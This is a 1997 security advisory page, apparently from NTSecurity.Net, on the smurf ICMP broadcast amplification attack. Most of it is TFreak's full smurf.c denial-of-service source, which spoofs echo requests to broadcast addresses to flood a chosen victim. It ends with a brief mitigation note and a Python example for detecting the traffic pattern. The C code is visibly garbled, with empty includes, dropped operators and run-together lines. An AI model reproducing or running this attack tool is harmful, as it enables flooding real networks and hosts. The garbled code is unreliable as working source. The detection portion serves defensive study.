TCP/IP FLOODING

Reported October 13, 1997 by TFreak

Systems Affected

Any system employing TCP/IP

The Problem

The smurf attack is quite simple. The program stores a list of broadcast addresses in an array, sends a spoofed ICMP echo request to each of those addresses in turn, and then starts again. Because every reply goes to the address forged as the source, the result is a devastating attack upon the spoofed IP. Depending on the number of broadcast addresses used, many, many computers may respond to the echo request.

This attack can EASILY saturate a T1 circuit, rendering it completely useless.

HERE IS THE SMURF SOURCE CODE:

                              *  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $*                              *  spoofs icmp packets from a host to various broadcast addresses resulting                              *  in multiple replies to that host from a single packet.                              *  disclaimer:                              *     I cannot and will not be held responsible nor legally bound for the                              *     malicious activities of individuals who come into possession of this                              *     program and I refuse to provide help or support of any kind and do NOT                              *     condone use of this program to deny service to anyone or any machine.                              *     This is for educational use only. Please Don"t abuse this.                              * TFreak                              */                              #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               #include                               void banner(void);                              void usage(char *);                              void smurf(int, struct sockaddr_in, u_long, int);                              void ctrlc(int);                              unsigned short in_chksum(u_short *, int);                              /* stamp */                              char id\[\] = $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $;                              int main (int argc, char *argv\[\])                              \{                                 struct sockaddr_in sin; 
                                struct hostent *he;                                 FILE   *bcastfile;                                 int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;                                 char   buf\[32\], **bcastaddr = malloc(8192);                                 banner();                                 signal(SIGINT, ctrlc);                                 if (argc h_addr, he->h_length);                                 sin.sin_family = AF_INET;                                 sin.sin_port = htons(0);                                 num = atoi(argv\[3\]);                                 delay = atoi(argv\[4\]);                                 pktsize = atoi(argv\[5\]);                                 if ((bcastfile = fopen(argv\[2\], r)) 

NULL) \{       perror(opening bcast file);       exit(-1);    \}    x = 0;    while (!feof(bcastfile)) \{       fgets(buf, 32, bcastfile);       if (buf\[0\]

"#" || buf\[0\]

"\n" || ! isdigit(buf\[0\])) continue;       for (i = 0; i 1024) \{       fprintf(stderr, ERROR: packet size must be                    \n\n                    target        = address to hit\n                    bcast file    = file to read broadcast addresses from\n                    num packets   = number of packets to send (0 = flood)\n                    packet delay  = wait between each packet (in ms)\n                    packet size   = size of packet (tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);    ip->ihl = 5;    ip->version = 4;    ip->ttl = 255;    ip->tos = 0;    ip->frag_off = 0;    ip->protocol = IPPROTO_ICMP;    ip->saddr = sin.sin_addr.s_addr;    ip->daddr = dest;    ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));    icmp->type = 8;    icmp->code = 0;    icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);    sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,           0, (struct sockaddr *)&sin, sizeof(struct sockaddr));    free(packet);           /* free willy! */ \} void ctrlc (int ignored) \{    puts(\nDone!\n);    exit(1); \} unsigned short in_chksum (u_short *addr, int len) \{    register int nleft = len;    register int sum = 0;    u_short answer = 0;    while (nleft > 1) \{       sum += *addr++;       nleft -= 2;    \}    if (nleft

1) \{       *(u_char *)(&answer) = *(u_char *)addr;       sum += answer;    \}    sum = (sum >> 16) + (sum + 0xffff);    sum += (sum >> 16);    answer = ~sum;    return(answer); \}

Stopping the Problem:

MCI has a tool called DoSTracker that may help you track down Smurf users.
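The traffic pattern described under The Problem can be looked for in packet or flow records, both on a network being used as an amplifier and at the victim. The following Python is an added example, not part of the original advisory and not related to DoSTracker; the record layout (source, destination, ICMP type), the function names and the sample addresses (documentation ranges) are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

ECHO_REQUEST, ECHO_REPLY = 8, 0

# Constructed sample records: (source, destination, ICMP type).
SAMPLE = [
    ("198.51.100.7", "192.0.2.255", 8),   # request to a broadcast address
    ("192.0.2.10", "198.51.100.7", 0),    # replies converging on one host
    ("192.0.2.11", "198.51.100.7", 0),
    ("192.0.2.12", "198.51.100.7", 0),
    ("203.0.113.5", "192.0.2.10", 8),     # ordinary ping ...
    ("192.0.2.10", "203.0.113.5", 0),     # ... and its solicited reply
]

def broadcast_echo_requests(packets, local_nets):
    """Amplifier side: echo requests addressed to a local subnet's broadcast
    (or all-zeros network) address. Returns (claimed_source, dst) pairs;
    the claimed source is the likely victim, not the real sender."""
    nets = [ipaddress.ip_network(n) for n in local_nets]
    targets = {a for n in nets for a in (n.broadcast_address, n.network_address)}
    return [(src, dst) for src, dst, icmp_type in packets
            if icmp_type == ECHO_REQUEST and ipaddress.ip_address(dst) in targets]

def reply_flood_victims(packets, min_sources=3):
    """Victim side: hosts receiving echo replies from at least min_sources
    distinct senders that they never sent an echo request to."""
    asked = {(src, dst) for src, dst, t in packets if t == ECHO_REQUEST}
    unsolicited = defaultdict(set)
    for src, dst, t in packets:
        if t == ECHO_REPLY and (dst, src) not in asked:
            unsolicited[dst].add(src)
    return {v: len(s) for v, s in unsolicited.items() if len(s) >= min_sources}

if __name__ == "__main__":
    print(broadcast_echo_requests(SAMPLE, ["192.0.2.0/24"]))
    print(reply_flood_victims(SAMPLE))
```

Both checks are heuristics: a legitimate broadcast ping from an administrator produces the same pattern, so the threshold and the list of local subnets need tuning per site.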

Credit:
Reported by TFreak
Posted here at NTSecurity.Net October 12, 1997